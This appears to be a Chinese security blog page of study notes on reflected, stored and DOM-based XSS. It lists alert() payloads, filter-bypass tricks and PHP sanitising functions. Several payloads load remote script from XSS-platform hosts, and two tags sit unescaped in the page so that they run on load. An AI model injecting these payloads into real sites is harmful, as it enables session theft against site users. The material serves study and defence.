<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.8.0" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.8.0" type="image/png" sizes="32x32"><meta name="description" content="#XSS跨站脚本注入攻击 跨站脚本(Cross-site Scripting )攻击，攻击者通过网站注入点注入客户端可执行解析的payload(脚本代码），当用户访问网页时，恶意payload自动加载并执行，以达到攻击者目的（窃取cookie、恶意传播、钓鱼欺骗等）。为了避免与HTML语言中的CSS相混淆，通常称它为”XSS”。 XSS分为：存储型 、反射型 、DOM型XSS ###反射性XSS">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS跨站脚本注入攻击">
<meta property="og:url" content="https://qingchuana.github.io/2023/08/17/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB/index.html">
<meta property="og:site_name" content="晴川&#39;s Blog">
<meta property="og:description" content="#XSS跨站脚本注入攻击 跨站脚本(Cross-site Scripting )攻击，攻击者通过网站注入点注入客户端可执行解析的payload(脚本代码），当用户访问网页时，恶意payload自动加载并执行，以达到攻击者目的（窃取cookie、恶意传播、钓鱼欺骗等）。为了避免与HTML语言中的CSS相混淆，通常称它为”XSS”。 XSS分为：存储型 、反射型 、DOM型XSS ###反射性XSS">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://qingchuana.github.io/2023/08/17/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB/AAwangzhan/1/hexoblog/source/image/image-20230915195201845.png">
<meta property="og:image" content="https://qingchuana.github.io/2023/08/17/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB/AAwangzhan/1/hexoblog/source/image/image-20230916112206026.png">
<meta property="og:image" content="https://qingchuana.github.io/2023/08/17/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB/AAwangzhan/1/hexoblog/source/image/image-20230916112226123.png">
<meta property="og:image" content="https://qingchuana.github.io/2023/08/17/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB/AAwangzhan/1/hexoblog/source/image/image-20230916142202534.png">
<meta property="og:image" content="https://qingchuana.github.io/2023/08/17/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB/AAwangzhan/1/hexoblog/source/image/image-20230916142627972.png">
<meta property="article:published_time" content="2023-08-16T16:00:00.000Z">
<meta property="article:modified_time" content="2023-11-12T09:23:54.809Z">
<meta property="article:author" content="Qingchuan">
<meta property="article:tag" content="笔记">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://qingchuana.github.io/2023/08/17/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB/AAwangzhan/1/hexoblog/source/image/image-20230915195201845.png"><title>XSS跨站脚本注入攻击 | 晴川's Blog</title><link ref="canonical" href="https://qingchuana.github.io/2023/08/17/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.8.0"><link rel="stylesheet" href="css/custom.css"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"复制","copySuccess":"复制成功","copyError":"复制失败"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 6.3.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">首页</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">归档</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">Hello Stun</div><div class="header-banner-info__subtitle">An elegant theme for Hexo</div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">XSS跨站脚本注入攻击</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">发表于</span><span class="post-meta-item__value">2023-08-17</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">更新于</span><span class="post-meta-item__value">2023-11-12</span></span></div></header><div class="post-body"><p>#XSS跨站脚本注入攻击</p>
<p>跨站脚本(Cross-site Scripting )攻击，攻击者通过网站注入点注入客户端可执行解析的payload(脚本代码），当用户访问网页时，恶意payload自动加载并执行，以达到攻击者目的（窃取cookie、恶意传播、钓鱼欺骗等）。<br>为了避免与HTML语言中的CSS相混淆，通常称它为”XSS”。</p>
<p>XSS分为：存储型 、反射型 、DOM型XSS</p>
<p>###反射性XSS</p>
<p><img src="/2023/08/17/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB/AAwangzhan\1\hexoblog\source\image\image-20230915195201845.png"></p>
<p>非持久化，仅执行一次，需要欺骗用户自己去点击链接才能触发XSS代码（服务器中没有这样的页面和内容），一般容易出现在搜索页面<br>DOM型XSS：不经过后端，DOM-XSS漏洞是基于文档对象模型(Document Objeet Model,DOM)的一种漏洞，DOM-XSS是通过url传入参数去控制触发的，其实也属于反射型XSS。<br>攻击流程：攻击者-&gt;发现存在反射性XSS-&gt;根据输出点环境构造xss代码-&gt;进行代码缩短（可有可无，仅为了增加迷惑性）-&gt;发送给受害者-&gt;受害者点开链接，xss代码执行完成攻击者代码工具。</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;h1&gt;hello,输入后会变成一级标题</span><br></pre></td></tr></table></div></figure>

<p><img src="/2023/08/17/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB/AAwangzhan\1\hexoblog\source\image\image-20230916112206026.png"></p>
<p><img src="/2023/08/17/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB/AAwangzhan\1\hexoblog\source\image\image-20230916112226123.png"></p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br><span class="line">&lt;script&gt;alert(1)&lt;/script&gt;</span><br><span class="line">过滤&lt;script&gt;,换为空</span><br><span class="line">&lt;sc&lt;script&gt;ript&gt;alert（1）&lt;/script&gt;</span><br><span class="line">换完之后为&lt;script&gt;alert(1)&lt;/script&gt;</span><br><span class="line">匹配大小写</span><br><span class="line">&lt;Script&gt;alert(1)&lt;/script&gt;</span><br><span class="line">对标签&lt;script&gt;进行过滤,可以用其他标签</span><br><span class="line">&lt;img src=1 onerror =alert(1)/&gt;</span><br><span class="line">防御：</span><br><span class="line">html转换字符</span><br><span class="line">$name=ntmlspecialchars($name)</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>ctfhub </p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;sCRiPt sRC=//0x.ax/J5ddFe&gt;&lt;/sCrIpT&gt;</span><br></pre></td></tr></table></div></figure>


        <h3 id="存储型XSS">
          <a href="#存储型XSS" class="heading-link"><i class="fas fa-link"></i></a><a href="#存储型XSS" class="headerlink" title="存储型XSS"></a>存储型XSS</h3>
      <p>特点：持久型</p>
<p>主要存在以攻击者将额恶意脚本存储到服务器的数据库中，当用户访问包含恶意相关数据的页面时，服务端未经严个过滤处理而输出在用户的浏览器中，导致浏览器执行代码数据</p>
<p>多见于评论留言框处</p>
<script>alert(1)</script>服务器将它存储于数据库中，每次访问都会进行弹窗，没次都是从数据库里查询这条语句，并且显示出来，

<p>影响范围广，每个人访问这个网站都会从数据库提取信息</p>
<p>防御：</p>
<blockquote>
<p>trim(string[, charlist]):<br>函数移除字符串两侧的空白字符或预定义字符( \t. \n.\xOB、\r)stripslashes(string) :<br>移除字符串中的反斜杠<br>mysqli_real_escape_string(connection, string) :<br>对字符串中sql的特殊符号(ixoo , \n , lr , ,，”, x1a )进行转义<br>strip_tags(string, allow)函数剥去字符串中的HTML、XML以及 PHP的标签;<br>addslashes(string)返回在预定义字符(单引号、双引号、反斜杠、NULL)之前添加反斜杠的字符串;还有最后一道htmlspecialchars()函数，让你不得翻身。</p>
</blockquote>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;/tExtArEa&gt;&#x27;&quot;&gt;&lt;sCRiPt sRC=https://0x.ax/J5ddFe&gt;&lt;/sCrIpT&gt;</span><br></pre></td></tr></table></div></figure>


        <h3 id="DOM型XSS">
          <a href="#DOM型XSS" class="heading-link"><i class="fas fa-link"></i></a><a href="#DOM型XSS" class="headerlink" title="DOM型XSS"></a>DOM型XSS</h3>
      <p>特点：通过JavaScript操作document，实现dom数的重构</p>
<p>主要存在与用户能修页面的dom，造成客户端playload在浏览器中运行</p>
<p><img src="/2023/08/17/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB/AAwangzhan\1\hexoblog\source\image\image-20230916142202534.png"></p>
<p>关键代码</p>
<p><img src="/2023/08/17/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB/AAwangzhan\1\hexoblog\source\image\image-20230916142627972.png"></p>
<p>现在第一个框提交’; <sCRiPt src="//xss.pt/J5ddFe">//</p>
<p>根据源码';将框起来的语句闭合，后面呢//会注释，将与前面<sCrIpT>闭合</p>
<sCRiPt sRC=//xss.pt/J5ddFe>//又与前面闭合


</sCrIpT></sCRiPt></p></div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ 本文结束，感谢您的阅读 ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">本文作者: </span><span class="copyright-author__value"><a href="https://qingchuana.github.io">Qingchuan</a></span></div><div class="copyright-link"><span class="copyright-link__name">本文链接: </span><span class="copyright-link__value"><a href="https://qingchuana.github.io/2023/08/17/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB/">https://qingchuana.github.io/2023/08/17/XSS%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">版权声明: </span><span class="copyright-notice__value">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> 许可协议。转载请注明出处！</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="https://qingchuana.github.io/tags/%E7%AC%94%E8%AE%B0/">笔记</a></span></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2023/08/20/Xml%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">Xml实体注入漏洞</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2023/08/10/2023%E5%B7%85%E5%B3%B0%E6%9E%81%E5%AE%A2%20unserialize%20%20wp/"><span class="paginator-prev__text">2023巅峰极客 Unserialize  Wp</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">文章目录</span><span class="sidebar-nav-ov">站点概览</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AD%98%E5%82%A8%E5%9E%8BXSS"><span class="toc-number">1.</span> <span class="toc-text">
          存储型XSS</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#DOM%E5%9E%8BXSS"><span class="toc-number">2.</span> <span class="toc-text">
          DOM型XSS</span></a></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/images/icons/stun-logo.svg" alt="avatar"></div><p class="sidebar-ov-author__text">Hello Stun</p></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">36</div><div class="sidebar-ov-state-item__name">归档</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="知识共享许可协议" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">你已阅读了 </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2023</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>Qingchuan</span></div><div><span>由 <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> 强力驱动</span><span> v6.3.0</span><span class="footer__devider">|</span><span>主题 - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.8.0</span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="/js/utils.js?v=2.8.0"></script><script src="/js/stun-boot.js?v=2.8.0"></script><script src="/js/scroll.js?v=2.8.0"></script><script src="/js/header.js?v=2.8.0"></script><script src="/js/sidebar.js?v=2.8.0"></script><script async>window.onload=function(){var a=document.createElement('script'),b=document.getElementsByTagName('script')[0];a.type='text/javascript',a.async=!0,a.src='/sw-register.js?v='+Date.now(),b.parentNode.insertBefore(a,b)};</script></body></html>